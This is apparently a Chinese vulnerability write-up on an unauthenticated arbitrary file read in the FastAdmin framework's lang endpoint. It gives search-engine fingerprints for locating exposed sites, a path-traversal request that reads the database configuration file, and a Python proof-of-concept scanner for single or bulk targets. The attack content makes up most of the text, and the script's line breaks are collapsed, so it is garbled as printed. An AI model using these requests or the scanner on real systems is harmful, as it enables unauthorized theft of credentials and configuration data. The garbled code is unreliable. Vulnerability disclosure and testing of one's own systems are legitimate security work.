声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
漏洞复现
1)信息收集,资产测绘
fofa:body=“/assets/js/require.js”
hunter:web.body=“/assets/js/require.js”
坚持,成为安全专家只差一点点了
2)构造数据包上传文件
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: ip
启动Yakit神器
测试工具
poc:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 指定脚本运行环境为Python,并设置文件编码为utf-8import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarningRED = '\033[91m'
# 定义红色文本的颜色代码RESET = '\033[0m'
# 定义重置文本颜色的代码# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# 禁用requests库在urllib3中的不安全请求警告def check_vulnerability(url):# 定义一个函数,用于检查指定URL是否存在漏洞try:# 尝试执行以下代码# 构造完整的攻击URLattack_url = url.rstrip('/') + "/index/ajax/lang?lang=%2e%2e/%2e%2e/application/database"# 发送GET请求到构造的URL,不验证SSL证书,超时时间设置为10秒response = requests.get(attack_url, verify=False, timeout=10)# 检查响应状态码是否为200,以及响应文本中是否包含'jsonpReturn'if response.status_code == 200 and 'jsonpReturn' in response.text:# 如果条件满足,打印出可能存在漏洞的信息print(f"{RED}URL [{url}] 可能存在Fastadmin框架lang任意文件读取漏洞{RESET}")else:# 如果条件不满足,打印出不存在漏洞的信息print(f"URL [{url}] 不存在漏洞")except requests.exceptions.Timeout:# 如果请求超时,打印出请求超时的信息print(f"URL [{url}] 请求超时,可能存在漏洞")except requests.RequestException as e:# 如果发生其他请求相关的异常,打印出请求失败的信息及异常内容print(f"URL [{url}] 请求失败: {e}")def main():# 定义主函数parser = argparse.ArgumentParser(description='检测目标地址是否存在Fastadmin框架lang任意文件读取漏洞')# 创建ArgumentParser对象,用于解析命令行参数,并设置描述信息parser.add_argument('-u', '--url', help='指定目标地址')# 添加命令行参数'-u'或'--url',用于指定单个目标地址parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 添加命令行参数'-f'或'--file',用于指定包含多个目标地址的文件args = parser.parse_args()# 解析命令行参数if args.url:# 如果指定了单个目标地址if not args.url.startswith("http://") and not args.url.startswith("https://"):# 如果地址不以http://或https://开头,则添加http://args.url = "http://" + args.urlcheck_vulnerability(args.url)# 调用check_vulnerability函数进行检查elif args.file:# 如果指定了包含目标地址的文件with open(args.file, 'r') as file:# 打开文件并逐行读取urls = file.read().splitlines()# 读取所有行并存储在urls列表中for url in urls:# 对列表中的每个URL进行处理if not url.startswith("http://") and not url.startswith("https://"):# 如果URL不以http://或https://开头,则添加http://url = "http://" + urlcheck_vulnerability(url)# 对每个URL调用check_vulnerability函数进行检查if __name__ == '__main__':main()# 如果脚本被直接运行,则调用main函数
运行截图:
 VUE指令)
)
)
)
